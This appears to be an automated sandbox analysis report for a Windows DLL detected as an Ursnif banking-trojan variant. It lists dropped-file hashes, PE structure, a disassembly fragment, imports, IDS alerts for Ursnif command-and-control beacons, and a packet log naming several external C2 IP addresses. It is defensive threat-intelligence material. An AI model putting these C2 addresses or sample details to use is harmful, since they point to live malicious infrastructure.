Entropy (8bit): | 3.1113362183779265 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySlAak7YnqqhllPN5Dlq5J:+RI+ycuZhNXakSpPNnqX |
MD5: | A88F00BBFDBFE259B40183FFC75D9408 |
SHA1: | 414BF62BCA044231DACA7752347698DBAA00E67B |
SHA-256: | C1B75F5C9B64488B0DBE50A2B867C85E3F9E9304CC2E13DDBAE1C39D4011C9AE |
SHA-512: | 794758EB33B865CBE03B977AB5DF6EC5DB5C0EADFC281483D51AD103E1F8D2C89FDE163A9B395574077041D79EFD629427FEB3544AB07C1A7860D136BF7ECCD5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 404 |
Entropy (8bit): | 5.019892496194437 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy |
MD5: | 04CA9F3DD2F71BC69A66232592BD29B7 |
SHA1: | 12724CB97FE30A8B84901648B3653B9AC8FB2F73 |
SHA-256: | DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1 |
SHA-512: | 383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.2488548966565 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723flw5iqzxs7+AEszIN723flw5ihLx:p37Lvkmb6K2atwPWZETatwgLx |
MD5: | 24931FFAE4DF7D6305385238DAD359FC |
SHA1: | FAB90F49021F1D60CB1E0606D926E7B677E48A87 |
SHA-256: | 61C2556798DFD3E26294CE2733EDC01C9406378272490722F1EF1D86C4A6EA99 |
SHA-512: | B3022A35DF07D97BB735F9C2B6BAC183FAEEEFF1914DD53ED35E148BBDAA2C09B148642244E86B91DEBC9A7CA4862CA61AD72A144048651D6A33CE1203E91862 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6253773115307077 |
Encrypted: | false |
SSDEEP: | 24:etGShW8OmU0t3lm85nt4tdalqQg6AYmS41lI+tkZfx1BpDVUWI+ycuZhNXakSpPE:6hQXQ3r5eXa19RxJx1t31ulXa3Lq |
MD5: | 8C5A6F27CC97FC8390400D7974C611CF |
SHA1: | 3C9C53FCEBD7599B86A1E07845C514EF16D0D6D1 |
SHA-256: | 1A9E722F89B142169DDC62341CDB475307FD856EE957177C81FE6D2AAA7106FD |
SHA-512: | 8B18D37847067790CBE2A7598A0A0F12F9AB50C513E3BBCBFB69CB4CC7A27BA0D31E860BA32CB4D5DA7B760D587DF211B909EC21F9546EFBFC97C37E5CF8C2EB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.328469441015724 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2atwMETatwDKaM5DqBVKVrdFAMBJTH:Akka6Ct5E+tAKxDcVKdBJj |
MD5: | 07018FFECE88CF001CB9D4AAC806AD94 |
SHA1: | 262110DE21684CEB1CF38B9AD2F8D0DE8BDD1FCA |
SHA-256: | 35535ED1DD51A2A54393C8E524F90E5D6E9B46AEE5DD8C54E794F619A1367580 |
SHA-512: | DD7AE380CE2468208A753244D70FF68DF4CB363EAE58D786223177AAB66AAB8669166C7498B419D84EAD00887825C790770A7AD975D8EFF31D7BB6F7A5A4692D |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.100104757369302 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryh3DVak7YnqqC3DaPN5Dlq5J:+RI+ycuZhNDBakSgmPNnqX |
MD5: | D954C33EBD78A0402D93912E9C840B10 |
SHA1: | B03DB0FBAA26849B99F4850034E9EBC80C70EA3A |
SHA-256: | 19FA8C1D11BF9A098961D905F621191401AD5993D19DA204584C94CD42943E95 |
SHA-512: | 6728C021468AA6BEA0C79BFB0DFA1D2A7897540E3F3CA255D55CEC5BE94FE236B1A57989E8F67E66D31C8BD704CE783A01D6603F7EC42A5BAAA2A5A31D0515DB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 408 |
Entropy (8bit): | 5.01293234302818 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy |
MD5: | 35EAB9A45B1CC09A0099A179AD3DCFE5 |
SHA1: | 42939AC7047BC372300FDD21624100E5C9F83B7F |
SHA-256: | EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7 |
SHA-512: | 03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.219912626484364 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fkVmn0zxs7+AEszIN723fkVYBH:p37Lvkmb6K2acG0WZETaca |
MD5: | 34A773F7B8389B7C20FDB6FF12917D5C |
SHA1: | D3A2E967E8DD581C15AB7E9F21B53473D176D39E |
SHA-256: | C704F25B7D106E06E3B26916B131E334000A13A10224DBC5F91F7D2819B82B00 |
SHA-512: | 5693BDE5AD8AB502C9A29FF73CBC65D9E00DA43AA7905DACE7E79B201BF049E1E6D6CAB1856ED8438C0404F6DEFA850004BEE45A1F90A6E09FC5CEF27E97EA0A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.62501849036444 |
Encrypted: | false |
SSDEEP: | 48:6ngXE7S5FwYXok+tW8J7dZX1ulDBa3gaq:0r7S5ekHAe3K |
MD5: | B63AB26774F1392792102FA250376086 |
SHA1: | D5AC0F6E7CA124ABDA2D5DF72E07D029D9F83AAD |
SHA-256: | D3948F33A5E41D61F208E5920DDD49E43448BF6423876208F012BA908F116B6A |
SHA-512: | 19E648C604D16438B972741CAEA22524AD8E1A215CED59DC88ACC296897A9DAB614296C2E322F85BE7B3FD77BE2BCC25E01468E8237ACDF1B90C85B8B2E35345 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.312830604004008 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2aRVETa6KaM5DqBVKVrdFAMBJTH:Akka6C3E+6KxDcVKdBJj |
MD5: | C16EB51C1D3455F1E5429F10376280E2 |
SHA1: | A8918021B5639615568E17FAB327A661353D7FAE |
SHA-256: | E0EB56671CE6EE4F722CBA06BB8BF577B0C55180E5D6841E56242A29550FF22A |
SHA-512: | CC6CFE8088BECB6CFD92D790E20546582B9973F7782FA67BE6F7757E0602A491CB7D9A4CD697745729A19AEFABEB34FCA1CBD5320930E41C5CB1371E4CF735C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 838 |
Entropy (8bit): | 3.073236880282747 |
Encrypted: | false |
SSDEEP: | 12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB |
MD5: | CA1C201059C5BFD5900F5EB2466883CC |
SHA1: | BF3670A8C06A4FABC5C410F368E178B353F9166C |
SHA-256: | E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085 |
SHA-512: | 2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220124\PowerShell_transcript.216554.+JTGvHZ_.20220124111050.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1375 |
Entropy (8bit): | 5.365567609663631 |
Encrypted: | false |
SSDEEP: | 24:BxSACh7vBVLdx2DOXUWApN56LCHzcd4XWbHjeTKKjX4CIym1ZJXa7gpN56LCHzch:BZCZvTLdoOo59z44GbqDYB1Zg7o59z4D |
MD5: | 603D401F7EAC08FC8B327D0EF2561455 |
SHA1: | 149854D9F7CB2305CF57F6688256F250121D6FC5 |
SHA-256: | B92DEAD3AECF556A4049EC4A4728B901E7F873F0DC303F546955A7429372829E |
SHA-512: | 8EA181C98205E902B4BEC5B63D58FB035E8ACB4EA761918DAA9218A10EDD488CAF299B6DCE7316E29031EA92CB180F37A9B2FB23E3D315A128C489F2C5AC934F |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220124\PowerShell_transcript.216554.38uu7uYg.20220124111043.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1379 |
Entropy (8bit): | 5.357208023916629 |
Encrypted: | false |
SSDEEP: | 24:BxSACXi7vBVLdx2DOXUWOOtLCHWft4XWsHjeTKKjX4CIym1ZJXaDOtLCHWft4Z16:BZC6vTLdoOPey4GsqDYB1ZgCey4ZpZZG |
MD5: | 713FE5DF4FF7D1A11AB057EDE7222C0A |
SHA1: | 57FB59FB06F2CBA46581854E79BBD18FBE370B60 |
SHA-256: | 61DCDB2A6CB6B53776A9E0A74F8440EAC5ABF42BA88CFC18A97FCF02DC355830 |
SHA-512: | BE8244E7E9D994AD4F6127808AFE1C5941A86F6C43A3501F30DC2F58BE0135A251E11FC557DA4705E883907BAF71D17950E355862E43CC36AE60A424BC0D41B1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 231 |
Entropy (8bit): | 5.4165391723637075 |
Encrypted: | false |
SSDEEP: | 6:QHMK1sS4VIpgKLMV4VsS+LgyKBM34H6xH83F1tu4r9iyej3:QsQsS4ij4a+S+LgyaI4HYcA4cyej3 |
MD5: | 84FABF1BB283E4633523CA8D54A205F7 |
SHA1: | 5F2826AB0B537DD3FFD5980DFE392C6CAD3588FD |
SHA-256: | BE23CC7E43D20E68AAF00213869083E04A1020BAB5B1EA6F9F14FC6CA7F4CCFD |
SHA-512: | 66FC2FE9DEB4EB9DC66F855D729E7953BB59838BB4F14AF7C1B0BB82999B5E5D09AA0D01ECA2551937E033D9BA771822BAF82C77E9E76CDF5655FA55715DC050 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.042994221038388 |
TrID: |
|
File name: | 61ee6edf7de65.dll |
File size: | 97280 |
MD5: | b6f0fc5638a110abac1a54805f77e786 |
SHA1: | f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe |
SHA256: | 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf |
SHA512: | b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8 |
SSDEEP: | 1536:2V4a+Lezr4lBJMMTQH41pf951L6e9IImUTKpobwjB52DXjaWVghVBDmC6eUd:i8or4TJMKz951feKTKobwjkGWqNmfd |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v.......v...v...v.......v....?..v.......v..Rich.v..........PE..L......a...........!.........\......0........0..... |
Icon Hash: | 30696968ccaacc4c |
Entrypoint: | 0x10001630 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x10000000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT |
Time Stamp: | 0x61EDF5E1 [Mon Jan 24 00:42:09 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 6 |
OS Version Minor: | 0 |
File Version Major: | 6 |
File Version Minor: | 0 |
Subsystem Version Major: | 6 |
Subsystem Version Minor: | 0 |
Import Hash: | 16fee73a0bcca61f5b30bccb8ad3cbcf |
Instruction |
---|
push ebp |
mov ebp, esp |
sub esp, 00000354h |
mov byte ptr [ebp-01h], 0000007Fh |
mov dword ptr [ebp-0Ch], 0000661Fh |
mov dword ptr [ebp-000000B0h], 000028DFh |
mov eax, dword ptr [ebp-0Ch] |
mov dword ptr [ebp-000000ECh], eax |
cmp dword ptr [ebp-000000ECh], 0000661Fh |
je 00007FA384C4F347h |
jmp 00007FA384C506D1h |
mov ecx, 000002EBh |
mov word ptr [ebp-08h], cx |
cmp dword ptr [ebp-0Ch], 00004BFFh |
jnle 00007FA384C4F380h |
movsx edx, word ptr [ebp-08h] |
or edx, 00000301h |
mov word ptr [ebp-08h], dx |
mov eax, dword ptr [ebp-0Ch] |
push eax |
mov ecx, dword ptr [ebp-0Ch] |
push ecx |
mov edx, dword ptr [ebp-0Ch] |
push edx |
mov eax, dword ptr [ebp-0Ch] |
push eax |
call 00007FA384C4F1F8h |
add esp, 10h |
mov ecx, dword ptr [ebp-0Ch] |
shl ecx, 0Dh |
mov dword ptr [ebp-0Ch], ecx |
movsx edx, byte ptr [ebp-01h] |
xor edx, 43h |
mov byte ptr [ebp-01h], dl |
jmp 00007FA384C5065Dh |
lea eax, dword ptr [ebp-08h] |
mov dword ptr [ebp-14h], eax |
movsx ecx, byte ptr [ebp-01h] |
sub ecx, 5Dh |
mov byte ptr [10004000h], cl |
mov dword ptr [ebp-000000ACh], 000037A9h |
mov edx, dword ptr [ebp-0Ch] |
mov dword ptr [ebp-1Ch], edx |
mov eax, dword ptr [ebp-1Ch] |
add eax, 000055AFh |
mov dword ptr [ebp-0Ch], eax |
mov ecx, dword ptr [ebp-1Ch] |
and ecx, 00007739h |
mov dword ptr [ebp-0Ch], ecx |
mov edx, dword ptr [ebp-000000ACh] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3354 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x14350 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b000 | 0x264 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x31ec | 0x1c | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x1ec | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1a6e | 0x1c00 | False | 0.516322544643 | data | 5.7793588503 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x3000 | 0xe12 | 0x1000 | False | 0.402587890625 | data | 4.808493385 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x4000 | 0x1c8 | 0x200 | False | 0.060546875 | data | 0.203681906087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.CRT | 0x5000 | 0x14 | 0x200 | False | 0.052734375 | SysEx File - Oberheim | 0.229276782846 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0x6000 | 0x14350 | 0x14400 | False | 0.655478395062 | data | 5.94341931663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x1b000 | 0x264 | 0x400 | False | 0.556640625 | data | 4.50253277193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x6180 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_RCDATA | 0xa948 | 0xfa07 | data | English | United States |
RT_GROUP_ICON | 0xa3a8 | 0x14 | data | English | United States |
RT_VERSION | 0xa520 | 0x428 | data | English | United States |
RT_MANIFEST | 0xa3c0 | 0x15a | ASCII text, with CRLF line terminators | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | GetSystemInfo, GetCurrentThreadId, GetCurrentProcessId, InitializeCriticalSection, QueryPerformanceFrequency, HeapCreate, GetVersion, GetProcessHeap, CreateTimerQueue, GetLogicalDrives |
USER32.dll | GetDlgItemTextA, CheckDlgButton, CheckRadioButton, IsDlgButtonChecked, SendDlgItemMessageA, DefDlgProcA, OpenClipboard, CloseClipboard, SetClipboardData, GetClipboardData, EnumClipboardFormats, EmptyClipboard, CharUpperA, CharLowerBuffA, SetFocus, GetActiveWindow, SetTimer, KillTimer, EnableWindow, LoadAcceleratorsA, DestroyAcceleratorTable, TranslateAcceleratorA, GetSystemMetrics, SetDlgItemInt, GetSystemMenu, CreatePopupMenu, DestroyMenu, CheckMenuItem, EnableMenuItem, GetSubMenu, AppendMenuA, RemoveMenu, TrackPopupMenu, InsertMenuItemA, SetMenuItemInfoA, SetActiveWindow, InvalidateRect, RedrawWindow, SetWindowTextA, GetWindowTextA, GetClientRect, GetWindowRect, MessageBoxA, SetCursor, GetCursorPos, ClientToScreen, ChildWindowFromPoint, GetSysColor, GetSysColorBrush, GetWindowLongA, SetWindowLongA, FindWindowA, CheckMenuRadioItem, LoadCursorA, DestroyCursor, LoadIconA, DestroyIcon, IsDialogMessageA, GetDlgItem, EndDialog, DialogBoxParamA, CreateDialogParamA, SetWindowPlacement, GetWindowPlacement, SetWindowPos, MoveWindow, DestroyWindow, IsMenu, IsWindow, GetClassInfoA, UnregisterClassA, RegisterClassA, CallWindowProcA, PostQuitMessage, PostMessageA, SendMessageA, DispatchMessageA, TranslateMessage, GetMessageA, wsprintfA, wvsprintfA, SetDlgItemTextA, GetMenu |
GDI32.dll | GetStockObject, DeleteObject, SelectObject, SetBkMode, SetTextColor, GetObjectA, CreateFontIndirectA |
COMDLG32.dll | GetOpenFileNameA, GetOpenFileNameW, GetSaveFileNameA, GetFileTitleW, ChooseColorW |
ADVAPI32.dll | RegSetValueA, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueA, GetUserNameA, RegCloseKey, RegCreateKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA |
VERSION.dll | GetFileVersionInfoW, VerInstallFileW |
Description | Data |
---|---|
LegalCopyright | Copyright Magnificenc gynaecologis automobil directionall codeword |
InternalName | Lecture |
FileVersion | 7.125.80.2 |
CompanyName | Descendan greyin |
LegalTrademarks | Chapter earthin highwayma acri |
Comments | Maladroi fallibilit |
ProductName | Garbag cribbag |
ProductVersion | 7.125.80.2 |
FileDescription | Formul flintlock adjudicate emi invigilator menarch |
OriginalFilename | Anhydrou |
Translation | 0x081a 0x081a |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
01/24/22-11:10:28.654587 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:31.338927 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.6 | 138.36.3.134 |
01/24/22-11:10:33.943277 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49762 | 80 | 192.168.2.6 | 211.40.39.251 |
01/24/22-11:10:34.818253 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49763 | 80 | 192.168.2.6 | 61.98.7.132 |
01/24/22-11:10:34.818253 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.6 | 61.98.7.132 |
01/24/22-11:10:40.364011 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49764 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:40.364011 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49764 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:42.969883 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49765 | 80 | 192.168.2.6 | 121.136.102.4 |
01/24/22-11:10:42.969883 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49765 | 80 | 192.168.2.6 | 121.136.102.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 24, 2022 11:10:28.501708984 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:28.653794050 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:28.653944969 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:28.654587030 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.021668911 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.617388964 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.617482901 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.617667913 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.793988943 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.794249058 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.794270992 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.794287920 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.794648886 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.989986897 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990014076 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990029097 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990221977 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.990263939 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990375042 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.990405083 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990451097 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990523100 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:29.990571976 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.990771055 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:29.991640091 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.225807905 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.225888968 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.225934029 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.225975037 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226013899 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226221085 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.226231098 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226316929 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226349115 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.226433992 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226519108 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.226632118 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226676941 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226718903 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226741076 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.226835966 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.226902962 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.227022886 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.227065086 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.227128029 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.227277040 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.282614946 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.440176964 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440228939 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440268993 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440305948 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440435886 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.440474033 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440514088 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440548897 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440583944 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.440630913 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.440886974 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440931082 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.440970898 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441006899 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441045046 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.441107988 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441167116 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.441431046 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
